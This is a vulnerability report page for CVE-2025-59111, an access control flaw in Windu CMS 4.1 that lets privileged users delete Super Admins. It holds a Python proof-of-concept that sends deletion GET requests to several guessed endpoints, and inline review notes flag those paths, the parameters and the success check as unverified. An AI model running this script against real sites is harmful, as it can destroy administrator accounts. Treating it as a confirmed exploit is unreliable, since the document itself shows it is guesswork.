Security Vulnerability Report
CVE-2025-59111 CVSS 6.5 MEDIUM

CVE-2025-59111

Published: 2025-11-18 15:16:33
Last Modified: 2025-12-05 13:16:03

Description

Windu CMS is vulnerable to Broken Access Control in its user editing functionality. A malicious attacker can send a GET request that allows privileged users to delete Super Admins, which is not possible through the GUI. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE
Windu CMS 4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-59111 PoC - Windu CMS 4.1 Access Control Bypass
# Target: Windu CMS <= 4.1 (before build 2250)
# Vulnerability: Broken Access Control allows deletion of Super Admin users
#
# NOTE(review): the advisory text says only version 4.1 was tested and
# confirmed vulnerable, and that the fix shipped in 4.1 build 2250; the
# "<= 4.1" range above is this script's own claim.
# NOTE(review): this listing was published flattened onto a single line. The
# nesting below is reconstructed from syntax; the placement of the
# "Response status" print and of `return False` is a reading, not a certainty.
# NOTE(review): the script needs an already-authenticated privileged session
# cookie, consistent with PR:H in the published CVSS vector. The underlying
# weakness is a server-side authorization check missing on a state-changing
# GET request, so the remedy is the vendor fix, not a client-side control.


def exploit(target_url: str, admin_cookie: str, target_user_id: str) -> bool:
    """Send a user-deletion GET request to several candidate paths.

    Each path in the candidate list is requested once with the same query
    string and headers. Progress is reported with print(); nothing is parsed
    from the response body.

    Args:
        target_url: Base URL that the candidate paths are appended to.
        admin_cookie: Value sent verbatim as the Cookie header.
        target_user_id: Value sent as the ``id`` query parameter.

    Returns:
        False in every case as reconstructed here; the result of the
        requests is never reflected in the return value.
    """
    # NOTE(review): the advisory does not name the affected route. These four
    # paths are guesses by the script's author and are not confirmed anywhere
    # on this page.
    endpoints = [
        f"{target_url}/user/edit",
        f"{target_url}/admin/user/delete",
        f"{target_url}/api/user/delete",
        f"{target_url}/index.php/user/delete"
    ]
    # Query parameters for the deletion request.
    # NOTE(review): the parameter names are likewise unverified against the
    # advisory.
    params = {
        'action': 'delete',
        'id': target_user_id,
        'confirm': '1'
    }
    headers = {
        'Cookie': admin_cookie,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    for endpoint in endpoints:
        try:
            print(f"[*] Trying endpoint: {endpoint}")
            response = requests.get(endpoint, params=params, headers=headers, timeout=10)
            # HTTP 200 only shows that the server answered the request. It
            # does not establish that an account was removed: a login page,
            # an error page or an unrelated route can return 200 as well.
            if response.status_code == 200:
                print(f"[+] Potential successful deletion attempt at {endpoint}")
                print(f"[*] Response status: {response.status_code}")
        except requests.RequestException as e:
            # Connection errors and timeouts are reported and the loop moves
            # on to the next candidate path.
            print(f"[-] Request failed: {e}")
    # Returned unconditionally; the caller below ignores the value.
    return False


if __name__ == "__main__":
    # Three positional arguments are required: base URL, cookie string, user id.
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-59111.py <target_url> <admin_cookie> <target_user_id>")
        print("Example: python cve-2025-59111.py http://target.com 'PHPSESSID=xxx' 1")
        sys.exit(1)
    target = sys.argv[1]
    cookie = sys.argv[2]
    user_id = sys.argv[3]
    print(f"[*] CVE-2025-59111 PoC - Windu CMS Access Control Bypass")
    print(f"[*] Target: {target}")
    print(f"[*] Target User ID: {user_id}")
    exploit(target, cookie, user_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59111", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:32.900", "lastModified": "2025-12-05T13:16:03.203", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to Broken Access Control in user editing functionality. Malicious attacker can send a GET request which allows privileged users to delete Super Admins which is not possible with GUI.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org", "source": "[email protected]", "tags": ["Product"]}]}}